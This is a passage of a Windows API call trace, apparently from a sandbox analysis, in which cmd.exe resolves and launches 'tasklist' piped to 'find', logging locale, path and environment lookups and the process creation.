lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop", nBufferLength=0x104, lpBuffer=0x5bf514, lpFilePart=0x5bf510 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x5bf510*="Desktop") returned 0x1c [0098.875] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 0x11 [0098.876] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x5bf290 | out: lpFindFileData=0x5bf290) returned 0x7042d8 [0098.876] FindClose (in: hFindFile=0x7042d8 | out: hFindFile=0x7042d8) returned 1 [0098.876] FindFirstFileW (in: lpFileName="C:\\Users\\5JgHKoaOfdp", lpFindFileData=0x5bf290 | out: lpFindFileData=0x5bf290) returned 0x7042d8 [0098.876] FindClose (in: hFindFile=0x7042d8 | out: hFindFile=0x7042d8) returned 1 [0098.876] _wcsnicmp (_String1="5JGHKO~1", _String2="5JgHKoaOfdp", _MaxCount=0xb) returned 29 [0098.876] FindFirstFileW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFindFileData=0x5bf290 | out: lpFindFileData=0x5bf290) returned 0x7042d8 [0098.876] FindClose (in: hFindFile=0x7042d8 | out: hFindFile=0x7042d8) returned 1 [0098.876] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 0x11 [0098.876] SetCurrentDirectoryW (lpPathName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 1 [0098.876] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 1 [0098.876] GetEnvironmentStringsW () returned 0x706190* [0098.876] FreeEnvironmentStringsA (penv="=") returned 1 [0098.876] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12b5a20 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0098.877] GetConsoleOutputCP () returned 0x1b5 [0098.877] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0098.877] GetUserDefaultLCID () returned 0x409 [0098.877] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x12b5560, cchData=8 | out: lpLCData=":") returned 2 [0098.877] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x5bf640, cchData=128 | out: lpLCData="0") returned 2 [0098.877] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x5bf640, cchData=128 | out: lpLCData="0") returned 2 [0098.877] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x5bf640, cchData=128 | out: lpLCData="1") returned 2 [0098.877] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x12b5570, cchData=8 | out: lpLCData="/") returned 2 [0098.877] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x12b5660, cchData=32 | out: lpLCData="Mon") returned 4 [0098.877] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x12b56a0, cchData=32 | out: lpLCData="Tue") returned 4 [0098.877] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x12b56e0, cchData=32 | out: lpLCData="Wed") returned 4 [0098.877] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x12b5720, cchData=32 | out: lpLCData="Thu") returned 4 [0098.877] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x12b5760, cchData=32 | out: lpLCData="Fri") returned 4 [0098.877] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x12b57a0, cchData=32 | out: lpLCData="Sat") returned 4 [0098.877] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x12b57e0, cchData=32 | out: lpLCData="Sun") returned 4 [0098.877] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x12b5580, cchData=8 | out: lpLCData=".") returned 2 [0098.877] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x12b5590, cchData=8 | out: lpLCData=",") returned 2 [0098.877] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0098.878] GetConsoleTitleW (in: lpConsoleTitle=0x704e28, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0098.878] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f70000 [0098.879] GetProcAddress (hModule=0x74f70000, lpProcName="CopyFileExW") returned 0x74f95d45 [0098.879] GetProcAddress (hModule=0x74f70000, lpProcName="IsDebuggerPresent") returned 0x74f8d16f [0098.879] GetProcAddress (hModule=0x74f70000, lpProcName="SetConsoleInputExeNameW") returned 0x759cdda0 [0098.879] _wcsicmp (_String1="tasklist", _String2=")") returned 75 [0098.879] _wcsicmp (_String1="FOR", _String2="tasklist") returned -14 [0098.879] _wcsicmp (_String1="FOR/?", _String2="tasklist") returned -14 [0098.879] _wcsicmp (_String1="IF", _String2="tasklist") returned -11 [0098.879] _wcsicmp (_String1="IF/?", _String2="tasklist") returned -11 [0098.879] _wcsicmp (_String1="REM", _String2="tasklist") returned -2 [0098.879] _wcsicmp (_String1="REM/?", _String2="tasklist") returned -2 [0098.880] _wcsicmp (_String1="FOR", _String2="find") returned 6 [0098.880] _wcsicmp (_String1="FOR/?", _String2="find") returned 6 [0098.880] _wcsicmp (_String1="IF", _String2="find") returned 3 [0098.880] _wcsicmp (_String1="IF/?", _String2="find") returned 3 [0098.880] _wcsicmp (_String1="REM", _String2="find") returned 12 [0098.880] _wcsicmp (_String1="REM/?", _String2="find") returned 12 [0098.881] _pipe (in: _PtHandles=0x7051f0, _PipeSize=0x0, _TextMode=32768 | out: _PtHandles=0x7051f0) returned 0 [0098.881] _dup (_FileHandle=1) returned 5 [0098.881] _dup2 (_FileHandleSrc=4, _FileHandleDst=1) returned 0 [0098.881] _close (_FileHandle=4) returned 0 [0098.881] _wcsicmp (_String1="tasklist", _String2="DIR") returned 16 [0098.881] _wcsicmp (_String1="tasklist", _String2="ERASE") returned 15 [0098.881] _wcsicmp (_String1="tasklist", _String2="DEL") returned 16 [0098.881] _wcsicmp (_String1="tasklist", _String2="TYPE") returned -24 [0098.881] _wcsicmp (_String1="tasklist", _String2="COPY") returned 17 [0098.881] _wcsicmp (_String1="tasklist", _String2="CD") returned 17 [0098.881] _wcsicmp (_String1="tasklist", _String2="CHDIR") returned 17 [0098.882] _wcsicmp (_String1="tasklist", _String2="RENAME") returned 2 [0098.882] _wcsicmp (_String1="tasklist", _String2="REN") returned 2 [0098.882] _wcsicmp (_String1="tasklist", _String2="ECHO") returned 15 [0098.882] _wcsicmp (_String1="tasklist", _String2="SET") returned 1 [0098.882] _wcsicmp (_String1="tasklist", _String2="PAUSE") returned 4 [0098.882] _wcsicmp (_String1="tasklist", _String2="DATE") returned 16 [0098.882] _wcsicmp (_String1="tasklist", _String2="TIME") returned -8 [0098.882] _wcsicmp (_String1="tasklist", _String2="PROMPT") returned 4 [0098.882] _wcsicmp (_String1="tasklist", _String2="MD") returned 7 [0098.882] _wcsicmp (_String1="tasklist", _String2="MKDIR") returned 7 [0098.882] _wcsicmp (_String1="tasklist", _String2="RD") returned 2 [0098.882] _wcsicmp (_String1="tasklist", _String2="RMDIR") returned 2 [0098.882] _wcsicmp (_String1="tasklist", _String2="PATH") returned 4 [0098.882] _wcsicmp (_String1="tasklist", _String2="GOTO") returned 13 [0098.882] _wcsicmp (_String1="tasklist", _String2="SHIFT") returned 1 [0098.882] _wcsicmp (_String1="tasklist", _String2="CLS") returned 17 [0098.882] _wcsicmp (_String1="tasklist", _String2="CALL") returned 17 [0098.882] _wcsicmp (_String1="tasklist", _String2="VERIFY") returned -2 [0098.882] _wcsicmp (_String1="tasklist", _String2="VER") returned -2 [0098.882] _wcsicmp (_String1="tasklist", _String2="VOL") returned -2 [0098.882] _wcsicmp (_String1="tasklist", _String2="EXIT") returned 15 [0098.882] _wcsicmp (_String1="tasklist", _String2="SETLOCAL") returned 1 [0098.882] _wcsicmp (_String1="tasklist", _String2="ENDLOCAL") returned 15 [0098.882] _wcsicmp (_String1="tasklist", _String2="TITLE") returned -8 [0098.882] _wcsicmp (_String1="tasklist", _String2="START") returned 1 [0098.882] _wcsicmp (_String1="tasklist", _String2="DPATH") returned 16 [0098.882] _wcsicmp (_String1="tasklist", _String2="KEYS") returned 9 [0098.882] _wcsicmp (_String1="tasklist", _String2="MOVE") returned 7 [0098.882] _wcsicmp (_String1="tasklist", _String2="PUSHD") returned 4 [0098.882] _wcsicmp (_String1="tasklist", _String2="POPD") returned 4 [0098.882] _wcsicmp (_String1="tasklist", _String2="ASSOC") returned 19 [0098.882] _wcsicmp (_String1="tasklist", _String2="FTYPE") returned 14 [0098.882] _wcsicmp (_String1="tasklist", _String2="BREAK") returned 18 [0098.882] _wcsicmp (_String1="tasklist", _String2="COLOR") returned 17 [0098.882] _wcsicmp (_String1="tasklist", _String2="MKLINK") returned 7 [0098.882] _wcsicmp (_String1="tasklist", _String2="DIR") returned 16 [0098.882] _wcsicmp (_String1="tasklist", _String2="ERASE") returned 15 [0098.882] _wcsicmp (_String1="tasklist", _String2="DEL") returned 16 [0098.882] _wcsicmp (_String1="tasklist", _String2="TYPE") returned -24 [0098.882] _wcsicmp (_String1="tasklist", _String2="COPY") returned 17 [0098.882] _wcsicmp (_String1="tasklist", _String2="CD") returned 17 [0098.882] _wcsicmp (_String1="tasklist", _String2="CHDIR") returned 17 [0098.882] _wcsicmp (_String1="tasklist", _String2="RENAME") returned 2 [0098.882] _wcsicmp (_String1="tasklist", _String2="REN") returned 2 [0098.882] _wcsicmp (_String1="tasklist", _String2="ECHO") returned 15 [0098.882] _wcsicmp (_String1="tasklist", _String2="SET") returned 1 [0098.882] _wcsicmp (_String1="tasklist", _String2="PAUSE") returned 4 [0098.882] _wcsicmp (_String1="tasklist", _String2="DATE") returned 16 [0098.882] _wcsicmp (_String1="tasklist", _String2="TIME") returned -8 [0098.882] _wcsicmp (_String1="tasklist", _String2="PROMPT") returned 4 [0098.882] _wcsicmp (_String1="tasklist", _String2="MD") returned 7 [0098.882] _wcsicmp (_String1="tasklist", _String2="MKDIR") returned 7 [0098.882] _wcsicmp (_String1="tasklist", _String2="RD") returned 2 [0098.882] _wcsicmp (_String1="tasklist", _String2="RMDIR") returned 2 [0098.882] _wcsicmp (_String1="tasklist", _String2="PATH") returned 4 [0098.882] _wcsicmp (_String1="tasklist", _String2="GOTO") returned 13 [0098.883] _wcsicmp (_String1="tasklist", _String2="SHIFT") returned 1 [0098.883] _wcsicmp (_String1="tasklist", _String2="CLS") returned 17 [0098.883] _wcsicmp (_String1="tasklist", _String2="CALL") returned 17 [0098.883] _wcsicmp (_String1="tasklist", _String2="VERIFY") returned -2 [0098.883] _wcsicmp (_String1="tasklist", _String2="VER") returned -2 [0098.883] _wcsicmp (_String1="tasklist", _String2="VOL") returned -2 [0098.883] _wcsicmp (_String1="tasklist", _String2="EXIT") returned 15 [0098.883] _wcsicmp (_String1="tasklist", _String2="SETLOCAL") returned 1 [0098.883] _wcsicmp (_String1="tasklist", _String2="ENDLOCAL") returned 15 [0098.883] _wcsicmp (_String1="tasklist", _String2="TITLE") returned -8 [0098.883] _wcsicmp (_String1="tasklist", _String2="START") returned 1 [0098.883] _wcsicmp (_String1="tasklist", _String2="DPATH") returned 16 [0098.883] _wcsicmp (_String1="tasklist", _String2="KEYS") returned 9 [0098.883] _wcsicmp (_String1="tasklist", _String2="MOVE") returned 7 [0098.883] _wcsicmp (_String1="tasklist", _String2="PUSHD") returned 4 [0098.883] _wcsicmp (_String1="tasklist", _String2="POPD") returned 4 [0098.883] _wcsicmp (_String1="tasklist", _String2="ASSOC") returned 19 [0098.883] _wcsicmp (_String1="tasklist", _String2="FTYPE") returned 14 [0098.883] _wcsicmp (_String1="tasklist", _String2="BREAK") returned 18 [0098.883] _wcsicmp (_String1="tasklist", _String2="COLOR") returned 17 [0098.883] _wcsicmp (_String1="tasklist", _String2="MKLINK") returned 7 [0098.883] _wcsicmp (_String1="tasklist", _String2="FOR") returned 14 [0098.883] _wcsicmp (_String1="tasklist", _String2="IF") returned 11 [0098.883] _wcsicmp (_String1="tasklist", _String2="REM") returned 2 [0098.883] _wcsicmp (_String1="tasklist", _String2="DIR") returned 16 [0098.883] _wcsicmp (_String1="tasklist", _String2="ERASE") returned 15 [0098.883] _wcsicmp (_String1="tasklist", _String2="DEL") returned 16 [0098.883] _wcsicmp (_String1="tasklist", _String2="TYPE") returned -24 [0098.883] _wcsicmp (_String1="tasklist", _String2="COPY") returned 17 [0098.883] _wcsicmp (_String1="tasklist", _String2="CD") returned 17 [0098.883] _wcsicmp (_String1="tasklist", _String2="CHDIR") returned 17 [0098.883] _wcsicmp (_String1="tasklist", _String2="RENAME") returned 2 [0098.883] _wcsicmp (_String1="tasklist", _String2="REN") returned 2 [0098.883] _wcsicmp (_String1="tasklist", _String2="ECHO") returned 15 [0098.883] _wcsicmp (_String1="tasklist", _String2="SET") returned 1 [0098.883] _wcsicmp (_String1="tasklist", _String2="PAUSE") returned 4 [0098.883] _wcsicmp (_String1="tasklist", _String2="DATE") returned 16 [0098.883] _wcsicmp (_String1="tasklist", _String2="TIME") returned -8 [0098.883] _wcsicmp (_String1="tasklist", _String2="PROMPT") returned 4 [0098.883] _wcsicmp (_String1="tasklist", _String2="MD") returned 7 [0098.883] _wcsicmp (_String1="tasklist", _String2="MKDIR") returned 7 [0098.883] _wcsicmp (_String1="tasklist", _String2="RD") returned 2 [0098.883] _wcsicmp (_String1="tasklist", _String2="RMDIR") returned 2 [0098.884] _wcsicmp (_String1="tasklist", _String2="PATH") returned 4 [0098.884] _wcsicmp (_String1="tasklist", _String2="GOTO") returned 13 [0098.884] _wcsicmp (_String1="tasklist", _String2="SHIFT") returned 1 [0098.884] _wcsicmp (_String1="tasklist", _String2="CLS") returned 17 [0098.884] _wcsicmp (_String1="tasklist", _String2="CALL") returned 17 [0098.884] _wcsicmp (_String1="tasklist", _String2="VERIFY") returned -2 [0098.884] _wcsicmp (_String1="tasklist", _String2="VER") returned -2 [0098.884] _wcsicmp (_String1="tasklist", _String2="VOL") returned -2 [0098.884] _wcsicmp (_String1="tasklist", _String2="EXIT") returned 15 [0098.884] _wcsicmp (_String1="tasklist", _String2="SETLOCAL") returned 1 [0098.884] _wcsicmp (_String1="tasklist", _String2="ENDLOCAL") returned 15 [0098.884] _wcsicmp (_String1="tasklist", _String2="TITLE") returned -8 [0098.884] _wcsicmp (_String1="tasklist", _String2="START") returned 1 [0098.884] _wcsicmp (_String1="tasklist", _String2="DPATH") returned 16 [0098.884] _wcsicmp (_String1="tasklist", _String2="KEYS") returned 9 [0098.884] _wcsicmp (_String1="tasklist", _String2="MOVE") returned 7 [0098.884] _wcsicmp (_String1="tasklist", _String2="PUSHD") returned 4 [0098.884] _wcsicmp (_String1="tasklist", _String2="POPD") returned 4 [0098.884] _wcsicmp (_String1="tasklist", _String2="ASSOC") returned 19 [0098.884] _wcsicmp (_String1="tasklist", _String2="FTYPE") returned 14 [0098.884] _wcsicmp (_String1="tasklist", _String2="BREAK") returned 18 [0098.884] _wcsicmp (_String1="tasklist", _String2="COLOR") returned 17 [0098.884] _wcsicmp (_String1="tasklist", _String2="MKLINK") returned 7 [0098.884] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0098.884] SetErrorMode (uMode=0x0) returned 0x0 [0098.884] SetErrorMode (uMode=0x1) returned 0x0 [0098.884] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x705228, lpFilePart=0x5bf49c | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x5bf49c*="Desktop") returned 0x1c [0098.884] SetErrorMode (uMode=0x0) returned 0x1 [0098.884] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0098.884] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0098.888] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0098.889] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0098.889] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0x5bf228, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5bf228) returned 0xffffffff [0098.889] GetLastError () returned 0x2 [0098.889] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0098.889] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0x5bf228, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5bf228) returned 0x705530 [0098.889] FindClose (in: hFindFile=0x705530 | out: hFindFile=0x705530) returned 1 [0098.889] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.COM", fInfoLevelId=0x1, lpFindFileData=0x5bf228, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5bf228) returned 0xffffffff [0098.889] GetLastError () returned 0x2 [0098.889] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.EXE", fInfoLevelId=0x1, lpFindFileData=0x5bf228, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5bf228) returned 0x705530 [0098.889] FindClose (in: hFindFile=0x705530 | out: hFindFile=0x705530) returned 1 [0098.889] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0098.890] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0098.890] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0098.890] SetErrorMode (uMode=0x0) returned 0x0 [0098.890] SetErrorMode (uMode=0x1) returned 0x0 [0098.890] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x70a3c0, lpFilePart=0x5bf244 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x5bf244*="Desktop") returned 0x1c [0098.890] SetErrorMode (uMode=0x0) returned 0x1 [0098.890] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0098.890] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0098.890] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0098.890] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0098.890] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0x5befd0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5befd0) returned 0xffffffff [0098.890] GetLastError () returned 0x2 [0098.890] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0098.890] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0x5befd0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5befd0) returned 0x705628 [0098.890] FindClose (in: hFindFile=0x705628 | out: hFindFile=0x705628) returned 1 [0098.890] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.COM", fInfoLevelId=0x1, lpFindFileData=0x5befd0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5befd0) returned 0xffffffff [0098.891] GetLastError () returned 0x2 [0098.891] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.EXE", fInfoLevelId=0x1, lpFindFileData=0x5befd0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5befd0) returned 0x705628 [0098.891] FindClose (in: hFindFile=0x705628 | out: hFindFile=0x705628) returned 1 [0098.891] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0098.891] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0098.891] GetConsoleTitleW (in: lpConsoleTitle=0x5bf4cc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0098.891] InitializeProcThreadAttributeList (in: lpAttributeList=0x5bf3f8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x5bf3dc | out: lpAttributeList=0x5bf3f8, lpSize=0x5bf3dc) returned 1 [0098.891] UpdateProcThreadAttribute (in: lpAttributeList=0x5bf3f8, dwFlags=0x0, Attribute=0x60001, lpValue=0x5bf3e4, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x5bf3f8, lpPreviousValue=0x0) returned 1 [0098.891] GetStartupInfoW (in: lpStartupInfo=0x5bf430 | out: lpStartupInfo=0x5bf430*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x24, hStdOutput=0x24c, hStdError=0x2c)) [0098.891] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0098.891] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0098.891] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0098.891] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0098.891] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0098.891] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0098.891] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0098.891] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0098.891] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0098.891] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0098.891] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0098.891] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0098.891] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0098.891] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0098.891] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0098.891] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0098.891] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0098.891] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0098.891] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0098.891] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0098.891] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0098.891] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0098.892] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0098.892] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0098.892] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0098.892] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0098.892] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0098.892] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0098.892] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0098.892] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0098.892] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0098.892] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0098.892] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0098.892] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0098.892] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0098.892] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0098.892] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0098.892] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0098.892] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0098.892] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0098.892] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0098.892] lstrcmpW (lpString1="\\tasklist.exe", lpString2="\\XCOPY.EXE") returned -1 [0098.893] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\tasklist.exe", lpCommandLine="tasklist", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0x5bf380*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="tasklist", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x5bf3cc | out: lpCommandLine="tasklist", lpProcessInformation=0x5bf3cc*(hProcess=0x64, hThread=0x60, dwProcessId=0xac8, dwThreadId=0xad8)) returned 1 [0098.896] CloseHandle (hObject=0x60) returned 1 [0098.896] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0098.896] GetEnvironmentStringsW () returned 0x7042d8* [0098.896] FreeEnvironmentStringsA (penv="=") returned 1 [0098.896] DeleteProcThreadAttributeList (in: lpAttributeList=0x5bf3f8 | out: lpAttributeList=0x5bf3f8) [0098.896] _get_osfhandle (_FileHandle=3) returned 0x54 [0098.896] DuplicateHandle (in: hSourceProcessHandle=0x64, hSourceHandle=0x54, hTargetProcessHandle=0x0, lpTargetHandle=0x0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x1 | out: lpTargetHandle=0x0) returned 1 [0098.896] _dup2 (_FileHandleSrc=5, _FileHandleDst=1) returned 0 [0098.896] _close (_FileHandle=5) returned 0 [0098.896] _dup (_FileHandle=0) returned 4 [0098.896] _dup2 (_FileHandleSrc=3, _FileHandleDst=0) returned 0 [0098.896] _close (_FileHandle=3) returned 0 [0098.897] _wcsnicmp (_String1="find", _String2="cmd ", _MaxCount=0x4) returned 3 [0098.897] SetErrorMode (uMode=0x0) returned 0x0 [0098.897] SetErrorMode (uMode=0x1) returned 0x0 [0098.897] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x7042e0, lpFilePart=0x5bf49c | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x5bf49c*="Desktop") returned 0x1c [0098.897] SetErrorMode (uMode=0x0) returned 0x1 [0098.897] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0098.897] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0098.897] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0098.897] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 